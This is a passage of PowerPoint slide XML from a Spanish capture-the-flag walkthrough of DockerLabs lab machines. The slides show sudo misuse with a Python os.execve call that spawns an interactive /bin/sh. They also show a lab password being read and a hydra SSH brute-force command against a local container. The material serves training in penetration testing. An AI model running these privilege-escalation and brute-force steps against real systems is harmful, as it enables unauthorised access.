                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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", ["/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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","-i"], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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os.environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="6400" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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&gt; PY</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="6400" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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571500" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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os.execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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", ["/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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","-i"], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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os.environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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);) reemplaza el proceso Python por /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-i (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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interactiva) usando las variables de entorno actuales.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sustituye el proceso actual por el binario indicado.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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De ese modo el proceso Python termina y en su lugar queda una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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interactiva con los UID/GID del proceso original.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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os.execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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es una llamada que reemplaza el proceso Python actual por otro programa: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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en este caso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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["/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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","-i"]: la lista </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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para el nuevo proceso; -i pide un Shell interactivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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571500" lvl="1" indent="-3429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"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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os.environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 el diccionario de variables de entorno (se las paso intactas al nuevo proceso).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="6400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0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069DFF3A-1EE6-4E8C-8075-8BBD97DFDE9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267450" y="3676980"/>
            <a:ext cx="4754563" cy="493782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6290FF09-145B-4977-9E11-777161C733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4122" y="4379933"/>
            <a:ext cx="3420152" cy="512108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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5FE0DFD-D2BF-4603-A475-52454EE76A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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>28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307172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15FA18-2C9B-46C0-B827-D8FA80D57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b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> jon@172.17.0.2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D0DEC36-B8B0-4C1A-B8EB-8BEA1E965A1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ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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.mensaje.py como sudo para que se ejecute como aria como vimos en sudo -l.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ES" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo -u aria /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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/python3 /home/jon/.mensaje.py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ES" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-la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ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Pasamos a comprobar los permisos de sudo que tiene concedidos aria.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ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Usar sudo como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sin necesidad de contraseña, concretamente el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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y el cat.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ES" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo -l</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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9" name="Marcador de contenido 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CD99F46-7C8B-4371-A50D-1CED7B0FEEE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080760" y="2057399"/>
            <a:ext cx="4754563" cy="572455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3EBAA17F-601F-4588-9319-9876CC3B03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0760" y="2721293"/>
            <a:ext cx="4499238" cy="2030144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291114B6-2F28-4453-A7D2-7EAB3D04BE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0760" y="4842876"/>
            <a:ext cx="5401524" cy="749873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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21ECC0D-70F4-4200-8676-8EB718778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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>29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840397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A06B85-7320-47C5-BFC2-9C9538E6B2E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/>
              <a:t>Paradise</a:t>
            </a:r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2ADEB7D0-364E-4BA5-B17A-FEC4ED9F282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b="1" i="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VM – Fácil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>https://dockerlabs.es/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82FBC28-F28A-4367-BCE7-6639345E62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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77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435316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A1EA00A-3F94-499F-81B0-8D834E0DB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 err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> jon@172.17.0.2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6BA0C8E-5D52-4ED3-8FDC-E574ACBB1DC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r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Esto implica que podemos listar y leer todo lo que tenga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Lo ejecutamos y nos muestra su home listado.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ES" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-la /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Concretamente nos centraremos en un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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mensajeParaJon.Nos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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muestra su contraseña de usuario; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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drakaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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lvl="1">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Sin signo de exclamación dado que lo hemos probado con signo y no era correcta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-P psw.txt ssh://172.17.0.2 -t64 -f</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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20E65867-4787-4A5A-BA6D-15AF3289FC5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263957" y="1513627"/>
            <a:ext cx="4754563" cy="1540084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1A1961BE-576C-4B81-9BF6-9856626627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4122" y="3693378"/>
            <a:ext cx="5401524" cy="1859441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A2E7A080-4F3E-43AE-AD70-707599F5A0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8085" y="5681547"/>
            <a:ext cx="5401524" cy="603556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6D2F960B-5D44-4825-9EDE-59EC10BEBF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4122" y="3240007"/>
            <a:ext cx="5401524" cy="377985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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46CE5CED-7F53-4C56-8BD6-F5809871C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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>30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981354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6B5264B-C7A5-4945-B6A6-6E7FE4B80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b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t> daenerys@172.17.0.2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B8DE046-A2A3-4272-B117-C345FE1DA56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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Ahora listamos su home, entramos en el .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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dado que es él único archivo root en dicho home y volvemos a listar para explorar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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–la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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cd .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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secret</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Si comprobamos los permisos de sudo asociados a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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encontramos que casualmente hace referencia al .shell.sh que acabamos de encontrar, de nuevo sin pedir contraseña podremos ejecutarlo como root.</a:t>
            </a:r>
          </a:p>
